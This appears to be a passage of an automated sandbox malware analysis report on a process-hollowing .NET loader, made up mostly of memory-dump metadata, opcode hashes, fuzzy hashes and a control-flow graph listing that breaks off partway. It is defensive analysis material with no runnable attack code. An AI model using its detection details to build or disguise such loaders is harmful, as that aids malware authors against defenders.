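              Run against the sample, the 06AD0000 region satisfies all four required imports with ReadProcessMemory as supporting evidence, the 00870000 region (LoadLibraryExW only) does not, and the single WM_CLOSE post is reported at 06ADE145. Treating the verdict as an import-set match rather than a call sequence is deliberate: in a hollowing loader written in .NET, the ordering that matters happens in managed code, and the disassembly listing only shows where each native import is invoked.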
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
              • Instruction ID: 81652b32e922e98221dcc66ee224107a80298dcf18517d9cd08fda89a4bb3187
              • Opcode Fuzzy Hash: aa064852e1c0bed6f1bd4af6d0abd53c91a6add9cdde15f57a59e0489b0c32fa
              • Instruction Fuzzy Hash: C6210371500344DFCB15DF14D9C0FA6BF6AFF98318F20C569E9098B256C33AD896DAA2
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0214706e38216ff53403946c932dedda09288e8c13085b76f1c8e0962a32dc3a
              • Instruction ID: b07ef6a066113149ed3619b28da39227b743cd7d42d29e1f9e980652fd4c3762
              • Opcode Fuzzy Hash: 0214706e38216ff53403946c932dedda09288e8c13085b76f1c8e0962a32dc3a
              • Instruction Fuzzy Hash: 70210671500304DFDB05DF14D9C0B56BF69FF98314F20C569E9098B256C33AE896D7A2
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
              • Instruction ID: 43c37240f04e6e57a935ea32a25c6d08cb8674c31678e96dc031119080ffc464
              • Opcode Fuzzy Hash: fc473e910d530a7a33aeb75636709a62caa995f535e82e26276dfc00fda89445
              • Instruction Fuzzy Hash: A621F571504304EFDB05DF14E5C0B26BFA5FB84314F20C56DD9098B256C33AE886CA61
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
              • Instruction ID: 30abcd788c9932c1e5cc79f476fac0539ba3662b6b64205c15688cf5262c7a65
              • Opcode Fuzzy Hash: 750896bd3c41e49e590e5289dfc40c897d775b5c91813f88d5c08378b360479e
              • Instruction Fuzzy Hash: 3A21F271604744DFCB14DF24E984B26BF65FB88314F20C569D94A8B3A6C33AD887CAA1
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction ID: e9c012e31079974d01c5059321bbd4f6f813f5ceeef44f05e0a49f58fa029e5f
              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction Fuzzy Hash: A111DF72404340CFCB16CF00D5C4B56BF71FB98324F24C6A9D9094B256C33AE85ACBA2
              Memory Dump Source
              • Source File: 00000000.00000002.2029468798.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_81d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction ID: 8dc1ce435c2f61966a31dc9f64e3bd0faa854ae5e06481acf88cd0d81c4908ad
              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
              • Instruction Fuzzy Hash: 2611DF72404280CFCB06CF10D5C4B96BF72FB98314F24C6A9D8494B256C336D85ACBA2
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction ID: b8d386ea37286f8ca44eef2ad48a249ccd98d9364c9f1a8cbd729bcb213b2675
              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction Fuzzy Hash: BB118E75504780DFDB15CF14E5C4B15BF61FB44314F24C6A9D8498B666C33AD84ACB62
              Memory Dump Source
              • Source File: 00000000.00000002.2029515038.000000000082D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0082D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_82d000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction ID: 37858e9299bb3ee5ea3b2c6b8e946a08a5aeebca685a259554d6677c12e1fd08
              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
              • Instruction Fuzzy Hash: 3A118B75504380DFDB16CF14D5C4B15BFA2FB84314F24C6A9D8498B696C33AE84ACB62
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07a814178dbdc98e96494379dfebaa9bdc162ffd86c339707b8f8a39c71ae192
              • Instruction ID: ca29c3b2c3e10d56d1821c8ed0868643423558d3b777867850a23d44b06a32ed
              • Opcode Fuzzy Hash: 07a814178dbdc98e96494379dfebaa9bdc162ffd86c339707b8f8a39c71ae192
              • Instruction Fuzzy Hash: E21286B0881F458ED710CFA5E94C1893B71B751318BF04A19D2617B2E5FBB8266EEF48
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2372f0f1d739d6152e26c4e112f0e0f964e4ad9b8714c48a268ff95f021ff64f
              • Instruction ID: cf653ebc8be4358952c42035aef4690b4a70a76f53e5f19e41abb4692981cf02
              • Opcode Fuzzy Hash: 2372f0f1d739d6152e26c4e112f0e0f964e4ad9b8714c48a268ff95f021ff64f
              • Instruction Fuzzy Hash: 59E12B74E001198FCB54DFA9C5809AEFBF2FF89305F248169E415AB35AD734A981CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9522136546f6fdb5cccebaf516f6ed99039cebd4e385f8fb846176a7753e743
              • Instruction ID: 11cb2d895f390b6f28e5ae2e124467edfe40c515c70dd8f9adddf6102e9cf901
              • Opcode Fuzzy Hash: a9522136546f6fdb5cccebaf516f6ed99039cebd4e385f8fb846176a7753e743
              • Instruction Fuzzy Hash: C8E12A74E001198FCB54DFA9C5809AEFBB2FF89305F248169E415AB35AD734A981CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 429e629eef41deed4562c77a6f386de72f05f23bd5139b37cf5e25060de53775
              • Instruction ID: ae4eec2b88ce81d6918443b1b99ce2537d533302f05eceeaafd5d63e7fa5f9f1
              • Opcode Fuzzy Hash: 429e629eef41deed4562c77a6f386de72f05f23bd5139b37cf5e25060de53775
              • Instruction Fuzzy Hash: 8AE13A74E002198FCB54DFA9C5809AEFBB2FF89305F24C169E515AB31AC731A941CFA0
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 654f72fdcf09dd2d138062bc8c77f3dbc779a0ccca5def40a24c27276c423dc5
              • Instruction ID: b57cdcbb09e07414eaaa40bcce9a0edbe5ee1187b7243d9db9b318fa08dad60c
              • Opcode Fuzzy Hash: 654f72fdcf09dd2d138062bc8c77f3dbc779a0ccca5def40a24c27276c423dc5
              • Instruction Fuzzy Hash: E2E12C74E002198FCB54DFA9C5809AEFBF2FF89305F249169D415AB35AD730A941CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1a5077701cd4d37a071ee612920afcb16f6152ce5b7ce9a076371102c8f42cd7
              • Instruction ID: 8679ce88c650a2bf9d0c770754e6cfbff2d90f9a083af9b7ba159432aed09c0c
              • Opcode Fuzzy Hash: 1a5077701cd4d37a071ee612920afcb16f6152ce5b7ce9a076371102c8f42cd7
              • Instruction Fuzzy Hash: 01E11A74E001198FCB54DFA9C5809AEFBF2FF89305F249169E415AB35AD730A941CFA1
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 172695161be4d9e3956419085a94d1be4066f271565641074e2e38f2f06bc22e
              • Instruction ID: 369e456d13bc9de260ff7b2645d5aabe51e7878964584a88c9cd8b055cd22aba
              • Opcode Fuzzy Hash: 172695161be4d9e3956419085a94d1be4066f271565641074e2e38f2f06bc22e
              • Instruction Fuzzy Hash: 09D14D31D20A5A8ADB01EF68D950ADDB7B5FFD5300F10979AD40977224EB706AC9CF81
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e38afd8cda3d3748d14e818f773609011c667a285941152bdf7a798a3c47b38
              • Instruction ID: f30f9fca19873f5b5dbad5b8607f8001053157e50820302c77ace0ab9ab9bd4b
              • Opcode Fuzzy Hash: 9e38afd8cda3d3748d14e818f773609011c667a285941152bdf7a798a3c47b38
              • Instruction Fuzzy Hash: 36A14C36E00609CFCF09DFA5C84059EB7B2FF85304B25857AE909EB26ADB31E955CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b428032d30a54a32f70ff0e312f5a8a7184e8a3a011e535f8815383edb4e6fd
              • Instruction ID: 7e0e95f975db68ad0cbfa5c218c7dcfb0881fe7ef21a25407a8e386300b865f0
              • Opcode Fuzzy Hash: 5b428032d30a54a32f70ff0e312f5a8a7184e8a3a011e535f8815383edb4e6fd
              • Instruction Fuzzy Hash: 3AD11B31D20A1A8ADB01EFA8D950A9DB7B5FFD5300F10D79AD50977224EB706AC9CF81
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9832bf32f470e9ff9f9f3ac58b58f4fd02bf230f8ac52d4676391d521f88b4a
              • Instruction ID: c484c517e0f3fb69041ebca11b5d2a346cf8054d3ad10ca0c9ba154e8d77c3ae
              • Opcode Fuzzy Hash: d9832bf32f470e9ff9f9f3ac58b58f4fd02bf230f8ac52d4676391d521f88b4a
              • Instruction Fuzzy Hash: A7D11B31D20A1A8ADB01EFA8D950A9DB7B5FFD5300F10D79AD50977224EB706AC9CF81
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8fc17e746f1d9d7b9e6a5aebc5aee68d5ed53ed3b933260efc6a30caa7b726ee
              • Instruction ID: a32f7bb190edc15277f4cd2a0ca54cb83d7f7bceb9880eb459c06683baf4e5dd
              • Opcode Fuzzy Hash: 8fc17e746f1d9d7b9e6a5aebc5aee68d5ed53ed3b933260efc6a30caa7b726ee
              • Instruction Fuzzy Hash: 49C11BB0C80B458FD711CFA5E8481897BB1BB95314BB04A19D1617B2D1FBB8366EEF48
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 49598fb43a9b89b4dd8a58e034ab253246c35e2d9a70e4a35eee1e9f471305b9
              • Instruction ID: 1cb48289879ea0c8c27e75518f38079897352d16e7f8db89d4ded2d1410408ba
              • Opcode Fuzzy Hash: 49598fb43a9b89b4dd8a58e034ab253246c35e2d9a70e4a35eee1e9f471305b9
              • Instruction Fuzzy Hash: 93616075E042198FDB54DFA9C9405AEFBF2EF89300F14816AD419AB366C730A942CFA1

              Execution Graph

              Execution Coverage:10.2%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:43
              Total number of Limit Nodes:2

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$(o]q$(o]q$,aq$,aq
              • API String ID: 0-615190528
              • Opcode ID: 2d3851bbd67e24882938ac8737219635a3d835ccf02080ecce43af0d06270235
              • Instruction ID: 8fe2f5bc49b0a899ae0b758ebaac050c683d0b90d99432d98018423a069e1361
              • Opcode Fuzzy Hash: 2d3851bbd67e24882938ac8737219635a3d835ccf02080ecce43af0d06270235
              • Instruction Fuzzy Hash: 80127EB0E00209DFCB15CF68C984AADBBB2FF8A355F198469E455EB2A1D734DC41DB50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: abd1ef189ef3d47e4450827e9c6dff9893b9bc3d32513e9e33a7f6370fec8b26
              • Instruction ID: 81dae229ed6d451608ad8cd657a71e4f8c8b4fe257feef8b37cd343e4479d378
              • Opcode Fuzzy Hash: abd1ef189ef3d47e4450827e9c6dff9893b9bc3d32513e9e33a7f6370fec8b26
              • Instruction Fuzzy Hash: 30E109B5E00658CFDB14CFA9D984A9DBBB1FF49310F1580A9E819AB362DB34AC41DF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 6c325eabb34b5505890da96c9719f47005c4a7a5405aa76e9472b0382dcb38fa
              • Instruction ID: 350c019cd38e87fb757fd4991220bbbae6c189c3412dbcd631ff12ba275349aa
              • Opcode Fuzzy Hash: 6c325eabb34b5505890da96c9719f47005c4a7a5405aa76e9472b0382dcb38fa
              • Instruction Fuzzy Hash: 0491D6B4E00218DFDB14DFAAD884A9DBBF2BF89310F14C069E809AB365DB349941DF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: e17ceb1642a15c5ac71f92b1c8cdddf8542caca782fc66b42de946576ac473ef
              • Instruction ID: 32d75a5797cd78b5fa581d238fe8455e6a28b73542c000d9ddd01fee64e414b6
              • Opcode Fuzzy Hash: e17ceb1642a15c5ac71f92b1c8cdddf8542caca782fc66b42de946576ac473ef
              • Instruction Fuzzy Hash: 6C91B2B4E01218CFDB14DFA9D884A9DBBF2BF89310F14C069E809AB365DB349945DF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 813570c96a9d76c3b43cc8b3218571b7aaf36769af8eb0daeaae87b085ab6409
              • Instruction ID: 154fe8a20d781db8d49aaf9bf5fa7fb198e548fd1a85bcbd1d3d1eb8aea07c1c
              • Opcode Fuzzy Hash: 813570c96a9d76c3b43cc8b3218571b7aaf36769af8eb0daeaae87b085ab6409
              • Instruction Fuzzy Hash: 1E81C5B4E00218DFDB14DFAAD984A9DBBF2BF89310F14C469E809AB365DB349941DF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 94f6e5896a062e199f5e58223ef057d1c0b0f85e8ad577dfefb122fdf10b0583
              • Instruction ID: b5549b10c4928211b2263ca646977e55be9ad9ab78f5d9cd7db1b925149dd496
              • Opcode Fuzzy Hash: 94f6e5896a062e199f5e58223ef057d1c0b0f85e8ad577dfefb122fdf10b0583
              • Instruction Fuzzy Hash: A981D3B4E01218DFDB14DFA9D884A9DBBF2BF89310F10C069E819AB365DB74A941DF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: 70a0bed12c639842dfc6660148f33ffc74e286939e0e721130bc458e9c996a8d
              • Instruction ID: 34c0516813f55b9d35394607369ef4a4627ae9111b6e72886742380d1b905483
              • Opcode Fuzzy Hash: 70a0bed12c639842dfc6660148f33ffc74e286939e0e721130bc458e9c996a8d
              • Instruction Fuzzy Hash: C281B5B4E00218DFDB14DFA9D984A9DBBF2BF89310F14C069E819AB365DB349941DF60

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: de0b2ba7a4daf019d237e513200f7a62eec7568fdd026919fa5dc045d66eeb8e
              • Instruction ID: 207366b0163a4d98bf28ad3666a7f7cfcce9abf6434c8fcd4b24eb2b9e9aa7f3
              • Opcode Fuzzy Hash: de0b2ba7a4daf019d237e513200f7a62eec7568fdd026919fa5dc045d66eeb8e
              • Instruction Fuzzy Hash: E981E5B4E00218CFDB14DFAAD984A9DBBF2BF89310F14C469E819AB365DB349941DF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 707 fabbd2-fabc00 708 fabc02 707->708 709 fabc07-fabce4 call fa3908 call fa3428 707->709 708->709 719 fabceb-fabd0c call fa4dc8 709->719 720 fabce6 709->720 722 fabd11-fabd1c 719->722 720->719 723 fabd1e 722->723 724 fabd23-fabd27 722->724 723->724 725 fabd29-fabd2a 724->725 726 fabd2c-fabd33 724->726 727 fabd4b-fabd8f 725->727 728 fabd3a-fabd48 726->728 729 fabd35 726->729 733 fabdf5-fabe0c 727->733 728->727 729->728 735 fabe0e-fabe33 733->735 736 fabd91-fabda7 733->736 745 fabe4b 735->745 746 fabe35-fabe4a 735->746 740 fabda9-fabdb5 736->740 741 fabdd1 736->741 742 fabdbf-fabdc5 740->742 743 fabdb7-fabdbd 740->743 744 fabdd7-fabdf4 741->744 747 fabdcf 742->747 743->747 744->733 746->745 747->744
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
              • API String ID: 0-1229222154
              • Opcode ID: fce955c98ede1fb76bc121c930d20e16a33d072274b1bb511bcdfddc21d26113
              • Instruction ID: 9aa01c17a3263336641f5c25de34c4972c401f3416e378a5a3a18da99e1cdd06
              • Opcode Fuzzy Hash: fce955c98ede1fb76bc121c930d20e16a33d072274b1bb511bcdfddc21d26113
              • Instruction Fuzzy Hash: 5481B5B4E00258DFDB14DFA9D984A9DBBF2BF89310F14C069E809AB366DB349941DF10
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 0o@p$PH]q$PH]q
              • API String ID: 0-2023588385
              • Opcode ID: b881334560d4c3965b2c345c311c0bd6bc4cd4e0bfc7ef7d484c808bc43bef69
              • Instruction ID: 1c0c99bdb2b354a00075d65b73239baa9564b1f5259ae0a93d6da192e7077b03
              • Opcode Fuzzy Hash: b881334560d4c3965b2c345c311c0bd6bc4cd4e0bfc7ef7d484c808bc43bef69
              • Instruction Fuzzy Hash: 9461E8B4E042589FDB18DFAAD944A9DBBF2FF89310F14C069E804AB366DB349941DF10
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$4']q
              • API String ID: 0-176817397
              • Opcode ID: 6116bede32143fa75b47baa70fcdcb3e307b3bafe53d93310960b11ab4b006b9
              • Instruction ID: df9dcdea916339a61e6fc3d6422c9f5cd7a7bab72108c2a180d5cbb130994523
              • Opcode Fuzzy Hash: 6116bede32143fa75b47baa70fcdcb3e307b3bafe53d93310960b11ab4b006b9
              • Instruction Fuzzy Hash: 5F72B0B1A04209DFCB15CF68C884AAEBBF2FF89310F158569E8059B2A1D770EC45DF61
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$Haq
              • API String ID: 0-903699183
              • Opcode ID: 1dd55d3f690706718bc69bee1ef958d5859db5ebddd08f3b8daf6adee3f22812
              • Instruction ID: f291136bffbbad46b1553d74d7f71e0fb3ee6081ca48d939696bf91f048bc98e
              • Opcode Fuzzy Hash: 1dd55d3f690706718bc69bee1ef958d5859db5ebddd08f3b8daf6adee3f22812
              • Instruction Fuzzy Hash: 4B12AEB0A002198FDB14DF69C844AAEBBF6FF89304F248569E845DB391DF349D46DB90
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 04427d702594d71969bc13624d0d8a9ff3af18a214c62e3c1d62f82a13a96025
              • Instruction ID: 65632708eecc8bdb8f4b97a1780bdaf9c7d420ebbe2c2acb0354fe6e3c46698f
              • Opcode Fuzzy Hash: 04427d702594d71969bc13624d0d8a9ff3af18a214c62e3c1d62f82a13a96025
              • Instruction Fuzzy Hash: 9372DFB4E012298FDB65DF69C880BEDBBB2BF49300F5481E9D408AB255DB349E85DF50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 fa6e58-fa6e8d 1 fa72bc-fa72c0 0->1 2 fa6e93-fa6eb6 0->2 3 fa72d9-fa72e7 1->3 4 fa72c2-fa72d6 1->4 11 fa6ebc-fa6ec9 2->11 12 fa6f64-fa6f68 2->12 9 fa7358-fa736d 3->9 10 fa72e9-fa72fe 3->10 17 fa736f-fa7372 9->17 18 fa7374-fa7381 9->18 19 fa7300-fa7303 10->19 20 fa7305-fa7312 10->20 28 fa6ecb-fa6ed6 11->28 29 fa6ed8 11->29 15 fa6f6a-fa6f78 12->15 16 fa6fb0-fa6fb9 12->16 15->16 36 fa6f7a-fa6f95 15->36 21 fa73cf 16->21 22 fa6fbf-fa6fc9 16->22 24 fa7383-fa73be 17->24 18->24 25 fa7314-fa7355 19->25 20->25 30 fa73d4-fa7404 21->30 22->1 26 fa6fcf-fa6fd8 22->26 77 fa73c5-fa73cc 24->77 34 fa6fda-fa6fdf 26->34 35 fa6fe7-fa6ff3 26->35 31 fa6eda-fa6edc 28->31 29->31 53 fa741d-fa7424 30->53 54 fa7406-fa741c 30->54 31->12 38 fa6ee2-fa6f44 31->38 34->35 35->30 41 fa6ff9-fa6fff 35->41 60 fa6fa3 36->60 61 fa6f97-fa6fa1 36->61 86 fa6f4a-fa6f61 38->86 87 fa6f46 38->87 43 fa72a6-fa72aa 41->43 44 fa7005-fa7015 41->44 43->21 47 fa72b0-fa72b6 43->47 58 fa7029-fa702b 44->58 59 fa7017-fa7027 44->59 47->1 47->26 62 fa702e-fa7034 58->62 59->62 63 fa6fa5-fa6fa7 60->63 61->63 62->43 66 fa703a-fa7049 62->66 63->16 67 fa6fa9 63->67 72 fa704f 66->72 73 fa70f7-fa7122 call fa6ca0 * 2 66->73 67->16 75 fa7052-fa7063 72->75 90 fa7128-fa712c 